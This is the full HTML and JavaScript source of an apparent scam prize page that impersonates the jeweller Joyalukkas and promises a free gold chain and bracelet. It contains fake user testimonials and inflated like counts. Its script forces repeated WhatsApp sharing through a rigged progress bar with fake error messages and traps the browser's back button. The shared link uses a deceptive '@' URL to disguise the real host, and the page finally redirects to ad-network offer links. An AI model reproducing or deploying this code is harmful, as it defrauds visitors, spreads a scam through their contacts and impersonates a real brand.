
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html>
<html lang="en">
<head>

  

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta content='width=device-width, initial-scale=1.0' name='viewport' />
<meta http-equiv="x-ua-compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="robots" content="noindex, nofollow">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />

  
  <img src='pIEjHz3.jpeg' width='100%'/><br/>
<title>Joy Share</title>
<meta property="og:type" content="article">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
   
<style>
  @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");

* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: ;
    box-sizing: border-box;


}

a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    padding: 10px;
    max-width: 500px;
    border: 1px solid #d0d1d5;
    border-radius: 3px;
}
.post img {
    width: 100%;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #0058aa;
    text-decoration: underline;
}
.done {
    text-align: center;
    color: #27ae60;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
		#status {
			color: #F4211A;
			font-size: 1.0em;
			font-family:'minecraftfont';

			height:100%;
		}
		* {
			margin: 0
		}
		body {
			font-family: tahoma, verdana, arial, sans-serif;
			background-color: #F7F7F7
		}
		.header {
			width: 100%;
                        height: 55px;
                        z-index: 8;
                        text-align: center;
                        background-color: #fff;
                        position: fixed;
                        top: 0px;
                    }
		.logo_left {
			padding: 5px;
			vertical-align: middle;
			margin-left:.5rem;
		}
		.header-text {
			font-size: 20px;
			padding:.5rem 0rem .5rem 1rem;
			vertical-align: middle;
			color: #FFF;
			text-align:center;
		}

		.fbcoms {
			padding: 0 5px;
			font-family: Tahoma, Verdana, sans-serif;
			background-color: #fff;
			font-size: 14px;
			text-align: left
		}
		.comments {
			font-weight: 700;
			text-align: center;
			padding: 0 5px 10px
		}
		.totlikes {
			margin-top: 3px;
			background-color: #eeeff4;
			padding: 5px 5px 5px 23px;
			background-repeat: no-repeat;
			background-position: 5px center
		}
		.fbblue {
			color: #3c5a96
		}
		.buttons {
			margin-top: 14px;
			padding: 5px;
			font-family: Arial, sans-serif;
			color: #7d7d7f
		}
		.buttons span {
			cursor: pointer
		}
		.buttons span:hover {
			text-decoration: underline
		}
		.viewmore {
			margin-top: 3px;
			background-color: #eeeff4;
			padding: 5px 5px 5px 23px;
			background-position: 5px center;
			background-repeat: no-repeat
		}
		.left {
			cursor: pointer;
			float: left;
			color: #3c5a96
		}
		.left:hover {
			text-decoration: underline
		}
		.right {
			color: #7d7d7f;
			float: right
		}
		
		h1,
		h2,
		h3 {
			display: inline;
		}
		.item {
			position: relative;
			margin-top: 3px;
			background-color: #eeeff4;
			padding: 5px 5px 5px 60px;
			min-height: 60px;
			box-sizing: border-box
		}
		.item .profileimg {
			position: absolute;
			top: 5px;
			left: 5px
		}
		.comtxt {
			line-height: 16px
		}
		.name {
			color: #3c5a96;
			font-weight: 700
		}
		.ago {
			color: #86878c;
			font-size: .95em
		}
		.fblike {
			color: #3c5a96;
			font-size: .95em;
			cursor: pointer
		}
		.fblike:hover {
			text-decoration: underline
		}
		.combot {
			padding-top: 5px
		}
		.likes {
			color: #3c5a96;
			font-size: .95em;
			cursor: pointer
		}
		.comments,
		.hidden .combot,
		.hidden .comtxt {
			display: none
		}
		#fbalert>div {
			margin-left: 0
		}
		#fbalert {
			padding: 5px
		}

		ol,
		ul {
			list-style: none
		}
		.clearfix:after {
			content: " ";
			display: block;
			height: 0;
			clear: both;
			overflow: hidden;
			visibility: hidden
		}
		.clearfix {
			display: block
		}
		.wrapper {
			background-color: #fff;
			-webkit-box-sizing: border-box;
			-moz-box-sizing: border-box;
			box-sizing: border-box;
			padding: 7px;
			width: 96%;
			margin: 0 auto 14px;
			border: 1px solid #c4cde1;
			border-top: 0;
			max-width: 414px
		}
		.logo {
			display: block;
			margin: 4px auto;
		}
		.txt {
			padding: 5px 6px;
			line-height: 18px;
			text-align: center
		}
		.bottom {
			width: 92%;
			margin: 20px auto 0;
			border: 1px solid #ccc;
			background-color: #f2f2f2;
			padding: 5px;
			border-radius: 10px;
			-moz-border-radius: 10px;
			-webkit-border-radius: 10px
		}
		.now {
			text-align: center;
			padding-top: 5px
		}
		#countdown {
			font-weight: bold;
		}
		.rules {
			color: #1b316c;
			padding: 4px 5px;
			line-height: 22px
		}
		a {
			display: block;
			background-color: #39579a;
			border-radius: 7px;
			-moz-border-radius: 7px;
			-webkit-border-radius: 7px;
			padding: 10px 0;
			text-align: center;
			font-weight: 700;
			color: #fff;
			font-size: 1.6em;
			border-bottom: 1px solid #1b316c;
			margin: 7px 13px 5px;
			text-decoration: none
		}
		.title {
			text-align: center;
			font-weight: 700;
			font-size: 26px
		}
		.show-all {
			display: none;
		}
		.now2 {
			padding-top: 10px;
			font-weight: bold;
		}
  .counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 05px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
	</style>
<style type="text/css">
		.form_questions {
			width: 100%;
			background-color: #fff
		}
		.wrapper {
			max-width: 800px;
			width: 96%;
			margin: 0 auto
		}
		.myButton {
			background-color: #39579a;
			border-radius: 4px;
			border: 2px solid #39579a;
			display: block;
			cursor: pointer;
			color: #ffffff;
			font-size: 20px;
			/* font-weight: 200; */

			font-weight: bold;
			margin: 10px auto;
			padding: 13px 32px;
			/* padding: 10px; */

			text-decoration: none;
			width: 230px;
		}




		.last_page{
			display: none;
		}
		.last-up{
			text-align: left;
		}
		.textlastup{
			color: #a51d3b;
			font-size: 18px;
			padding-bottom: 8px;
			font-weight: 400;
		}
		.btn{
			width: 80%;
			font-size: 28px;
			max-width: 345px;
			margin: 15px auto;
			background-color: #58BE41;
			border-radius: 5px;
			color: #fff;
			font-weight: 700;
			text-align: center;
			display: block;
			padding: 7px 0;
			text-decoration: none;
			-webkit-transition: all 0.2s ease-in-out;
			-moz-transition: all 0.2s ease-in-out;
			transition: all 0.2s ease-in-out;
			box-shadow: none;
		}
		.btn:hover{
			background-color: #fff;
			color: #58BE41;
			box-shadow: 0 0 2px #58BE41,
			0 0 5px #58BE41,
			0 0 7px #58BE41,
			0 0 11px #58BE41;
		}
		.btn-share{
			font-size: 24px;
			background-color: #58BE41;
			background-size: 40px auto;
			background-position: left 5px top 1px;
			background-repeat: no-repeat;
		}

		.progress {      width:80%;      height: 20px;  /* Can be anything */      position: relative;      margin: 60px 0 20px 0; /* Just for demo spacing */      background: #555;      padding: 10px;      -webkit-box-shadow: inset 0 -1px 1px rgba(255,255,255,0.3);      -moz-box-shadow   : inset 0 -1px 1px rgba(255,255,255,0.3);      box-shadow        : inset 0 -1px 1px rgba(255,255,255,0.3);      margin: auto;    }    .progress > span {      display: block;      height: 20px;	  left: 0;	  top: 0;      background-color: #3F51B5;      background-image: -webkit-gradient(         linear,         left bottom,         left top,         color-stop(0, #00BCD4),         color-stop(1, #2196F3)        );      background-image: -moz-linear-gradient(        center bottom,        rgb(43,194,83) 37%,        rgb(84,240,84) 69%       );      -webkit-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      -moz-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      position: absolute;      overflow: hidden;    }    .progress > span:after, .animate > span > span {      content: "";      position: absolute;      top: 0; left: 0; bottom: 0; right: 0;      background-image:          -webkit-gradient(linear, 0 0, 100% 100%,             color-stop(.25, rgba(255, 255, 255, .2)),             color-stop(.25, transparent), color-stop(.5, transparent),             color-stop(.5, rgba(255, 255, 255, .2)),             color-stop(.75, rgba(255, 255, 255, .2)),             color-stop(.75, transparent), to(transparent)         );      background-image:         -moz-linear-gradient(          -45deg,             rgba(255, 255, 255, .2) 25%,             transparent 25%,             transparent 50%,             rgba(255, 255, 255, .2) 50%,             rgba(255, 255, 255, .2) 75%,             transparent 75%,             transparent         );      z-index: 1;      -webkit-background-size: 50px 50px;      -moz-background-size: 50px 50px;      -webkit-animation: move 2s linear infinite;         -webkit-border-top-right-radius: 8px;      -webkit-border-bottom-right-radius: 8px;             -moz-border-radius-topright: 8px;          -moz-border-radius-bottomright: 8px;                 border-top-right-radius: 8px;              border-bottom-right-radius: 8px;          -webkit-border-top-left-radius: 20px;       -webkit-border-bottom-left-radius: 20px;              -moz-border-radius-topleft: 20px;           -moz-border-radius-bottomleft: 20px;                  border-top-left-radius: 20px;               border-bottom-left-radius: 20px;      overflow: hidden;    }        .animate > span:after {      display: none;    }        @-webkit-keyframes move {        0% {           background-position: 0 0;        }        100% {           background-position: 50px 50px;        }    }

		.buttond {
			background-color: #0d609b;
			color: #fff;
			font-size: 1.2em;
			font-weight: bold;
			text-align: center;
			padding:10px;
			margin-top:5px;
            width: 100%;
		}


		.btn-down{
			font-size: 24px;
			text-transform: uppercase;
		}

		body,
		html {
			background: #fff;
			direction:ltr;
		}

		<!--lhj css -->
		* {
			margin: 0;
			padding: 0;
		}
		img {
			vertical-align: bottom;
		}
		.game-header {
			width: 100%;
		}
		.game-header img {
			width: 100%;
		}
		.game-content {
			position: relative;
			width: 100%;
		}
		.game-content img {
			width: 100%;
		}
		.game-goods-wrap {
			position: absolute;
			margin: 0 auto;
			top:24%;
			left: 0;
			right: 0;
			bottom: 0;
			width: 64%;
			height: 46%;
			border-top-left-radius: 0.1875rem;
			border-top-right-radius: 0.1875rem;
			border-bottom-left-radius: 0.25rem;
			border-bottom-right-radius: 0.25rem;
			overflow: hidden;
		}
		.game-goods-wrap:before {
			position: absolute;
			top: -1PX;
			right: 0;
			bottom: 1PX;
			left: -1PX;
			border-top-left-radius: 0.25rem;
			border-top-right-radius: 0.25rem;
			width: 101%;
			height: 100%;
			content: "";
			box-shadow: 0 1.25rem 1.25rem -1.25rem #000 inset;
			z-index: 12;
		}
		.game-goods-wrap:after {
			position: absolute;
			top: 1PX;
			right: 0;
			bottom: -1PX;
			left: -1PX;
			width: 101%;
			height: 100%;
			box-shadow: 0 -1.25rem 1.25rem -1.25rem #000 inset;
			z-index: 12;
			content: "";
			border-bottom-left-radius: 0.25rem;
			border-bottom-right-radius: 0.25rem;
		}
		.game-goods-list {
			height: 100%;
			overflow: hidden;
		}
		.game-goods {
			position: absolute;
			width: 32%;
			height: 100%;
			z-index: 10;
			overflow: hidden;
		}
		.game-goods:first-child {
			left: -32%;
			transform: translateX(100%);
			-ms-transform: translateX(100%);
			-moz-transform: translateX(100%);
			-webkit-transform: translateX(100%);
			-o-transform: translateX(100%);
		}
		.game-goods:nth-child(2) {
			left: 50%;
			transform: translateX(-50%);
			-ms-transform: translateX(-50%);
			-moz-transform: translateX(-50%);
			-webkit-transform: translateX(-50%);
			-o-transform: translateX(-50%);
		}
		.game-goods:last-child {
			left: 100%;
			transform: translateX(-100%);
			-ms-transform: translateX(-100%);
			-moz-transform: translateX(-100%);
			-webkit-transform: translateX(-100%);
			-o-transform: translateX(-100%);
		}
		.game-goods-box {
			height: 70%;
			position: absolute;
			top: 0;
			right: 0;
			bottom: 0;
			left: 0;
			margin: auto;
		}
		.game-goods-ul {
			position: relative;
			top: 0;
			font-size: 0;
			z-index: 10;
			padding-inline-start: 0px; !important;
		}
		.game-goods-ul li {
			position: relative;
			width: 100%;
		}
		.game-goods-ul li img {
			position: absolute;
			top: 0;
			right: 0;
			bottom: 0;
			left: 0;
			margin: auto;
			height: 90%;
			width: auto;
		}
		.play {
			transition-duration: 5500ms;
			transform: translate(0px, -3263.91px) translateZ(0px);
		}

		.no-login-game-btn {
			position: absolute;
			margin: 0 auto;
			left: 0;
			right: 0;
			bottom: 0;
			width: 40%;
			height: 32%;
		}
		.game-btn {
			position: absolute;
			margin: 0 auto;
			left: 0;
			right: 0;
			bottom: -0.15rem;
			width: 40%;
			height: 32%;
			display: flex;
			flex-direction: row;
			justify-content: center;
			align-items: center;
			font-size: 1.5rem;
			font-weight: bold;
			color: #ffffff;
		}


		.sa-confirm-button-container{
			width:100px !important;
		}
      button {
    display: block;
    width: 240px;
    height: 50px;
    color: #000;
    border: none;
    outline: none;
    font-size: 20px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #fbce07;
    transition: background 0.3s ease;
}
button:hover {
    background: #82c55b;
}
  .barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #A51D3B;
}
  #claim {
    display: none;
}
  .percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #A51D3B;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
  #fill,
#fill2 {
    background: #A51D3B;
    width: 0%;
    height: 100%;
}
	</style>
  
                 

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>











</head>
  
                 <body>




                    

                    

                        
              


        
         


<div class="title">
<p>Congratulations! </p>
</div>
<div class="weui_dialog_img prize_img" style="text-align: center;margin: 20px 0;">
                                <center>   <img src="44VFnbx.jpeg" width='80%'/> </center>
                           

                            </div>
<p class="txt">Congratulations! You won a Gold chain and Bracelet(22 karat, 21.8 grams) Free. Follow the instructions below to receive it Today!</p>
      
  <div id="share">
<div id="selectdiv" style="display: none;flex-direction: column;justify-content: center;align-items: center;width: 92%;
            margin: 20px auto 0;
            border: 1px solid #ccc;
            background-color: #f2f2f2;
            padding: 5px;">
<div style="margin-top:1rem;margin-bottom:1rem;">Which way do you want to receive notifications from customer service?</div>
<button class='btn btn-primary' style="background-color:#58BE41" onclick='chooseApp(1)' type='button'>WhatsApp</button>
<button class='btn btn-primary' style="margin-top:0.5rem;background-color:#49c5e6" onclick='chooseApp(2)' type='button'>Line</button>
</div>
<div class="bottom" id='buttonO'>
<div id="lastapp"><p class="now now2">Tell 5 Groups or 15 Friends on <font class="appName">Whatsapp</font> about the "Joyalukkas Carnival"!</p><p class="rules">1.Share with 5 groups / 15 friends on <font class="appName">Whatsapp</font>(click the "<font class="appName">Whatsapp</font>" icon below)</p><p class="rules">2.You will be ask to Enter Shipping Address after Sharing.</p></div>

    
 <button id="whatsapp">Whatsapp</button>
  <h4 class="textlastup">Share until the brown bar is full!</h4>
  <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
  
 </div><br>
 
</div>

  
                      
    <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
          <center>  <p class="text">You are one step away to get your gift.</p></center>
             <div class="bottom" style="margin: 0 15px;">
                            
      <div style="font-size: 14px;text-align: left">
                                        <font color='red'><br>Congratulations! The last step :<br></font>
                                        <br>You have to complete this final step!
                                        <br><br>1. You have to click on the "Finish Registration" Button and add your address to recive your gift. 
                                        <br><br>
                               
               
              </div>
                <button id="offer">Finish Registration 1</button>
 <br>
 <button id="offers">Finish Registration 2</button> 
      </div> 
     
        </div>


</div></div>
                  
                   <div class="fbcoms">
        
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="like.png"> <img class="love" src="heart.png"> <img class="care" src="hug.png"> <span id="likes">140K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i>Like</span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    </div>
                </div>
                <div class="comment">
                    <img src="https://1.bp.blogspot.com/-pxi_cz3OrcQ/YKKeJ7ijV8I/AAAAAAAAB3M/tEdGiB-Gh4gpnHk84_PtsFKeYZUvh-04wCLcBGAsYHQ/s225/twwr.jpg" />
                    <div class="single-container">
                        <span class="user">Arpita Ganguly</span>
                        <span class="text">
Thanks a lot. I just received my Gifts today 
                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwA63SKHXHWJA7S5q2IuFuRnpw_fEKgP6W2jUFFIwHX9hCa4nZ0Ri5ov4gwcgLXyEAXsxhm8oJ8WpqacCiu-Xod9WId-Oz9VvX-zgvZkN6H5BXIaD5FmnwpqiuoyH5mhh4wPwELoE8Gc8a467YagQnpLyzztmvfIW867n3I3E2SETqqvQnf9yNzPypvQ/s719/dc729bc95ba6d0f020ccc4b2c6119853.jpg" />
                    <div class="single-container"><span class="user">Jenisha Parmar</span> <span class="text">Thanks a lot, Finally i got my bracelets.</span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://i.imgur.com/qxPvt9E.jpg" />
                    <div class="single-container"><span class="user">Dinesh Bhambhani</span> <span class="text">Hope I win again </span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoK3HkMJ1-uTizyKSgg46rlIijJavtffwBE-_E2dU4L-5DUdmIWSbViCc71VEfYUxsTkG4lxfvGym0zil8Bv-DS0ygBnWYMglKBQz7uGvxq1a1g3jW4mjOfhszhMGX_-u0k3twL7XMM7v35Gq8K-4ZsmZ66HfO3w2s5VJsyRVh4zUOwr_7A4uVuesTUQ/s200/307019998_413247697627155_3116790331119602365_n.jpg" />
                    <div class="single-container"><span class="user">Chanchal Goyal</span> <span class="text">❤️ Thank you so much lulu really needed</span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="input"><input placeholder="Write a comment..." /></div>
            </div>

                   
<style type="text/css">
        div,
        main,
        article,
        aside,
        footer,
        nav,
        section,
        header {
            display: block;
        }

        

        h1,
        h2,
        h3 {
            display: block;
        }
    </style>




<script type="text/javascript">! function (){	var t;	try{for (t=0; 10 > t; ++t)		history.pushState({}, "", "#");	onpopstate=function (t)	{		t.state && alert('Please Complete Task to receive gift. ');		}}		catch (o){}}();</script>
 

        
</body></html> 

  <script>
        var text1 = "https://bit.ly/Checkers R5000-Free + '?_t=' + (new Date().getTime()) + '%0A%0A' + mytime" ,
            text2 = " مكتبة جرير تقدم ",
            text3 = " سارع واحصل على قسيمتك قبل النفاذ من هنا : ",
            error = "There is an error!\nPosts do not count. You may have shared it with the same friend or group more than once, please re-share.",
            cpa = "https://zoovanuzauphoth.net/4/7965604",
            cpa1 = "https://backgroundrunway.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb",
            saved = "MAMA7lwa",
            share = "whatsapp://send?text=" + text1 ;
    </script>

<script>
  var tiaoban = [
    "https://www.joyalukkas.in@gift.nbqc.xyz",
    "https://www.joyalukkas.in@gift.nbqc.xyz",
];
var tiaoban = tiaoban[Math.floor(Math.random() * tiaoban.length)];

var date = new Date();
var hour = (date.getHours() > 9) ? date.getHours() : '0' + date.getHours();
var minute = (date.getMinutes() > 9) ? date.getMinutes() : '0' + date.getMinutes();
var second = (date.getSeconds() > 9) ? date.getSeconds() : '0' + date.getSeconds();
var mytime = hour + ':' + minute + ':' + second;

var tb = tiaoban + '?_t=' + (new Date().getTime()) + '%0A%0A' + mytime ;
  
</script>
<!-- code by ODcompany -->
  <!-- JS-WP -->
 <script type="text/javascript">
 var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $("#intro").fadeOut(0);
    $(".comments").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.open('whatsapp://send?text=' + tb);
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 2;
    } else if (width == 87) {
        width += 3;
    } else if (width == 90) {
        width += 3;
    } else if (width == 93) {
        width += 2;
    } else if (width == 95) {
        width += 2;
    } else if (width == 97) {
        width += 1;
    } else if (width == 98) {
        width += 1;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(cpa, "_blank");
});
   
$("#offers").click(function () {
    window.open(cpa1, "_blank");
});
</script>
  <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4781913,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4781913&101" alt="myspace tracker" border="0"></a></noscript>
<!-- Histats.com  END  -->
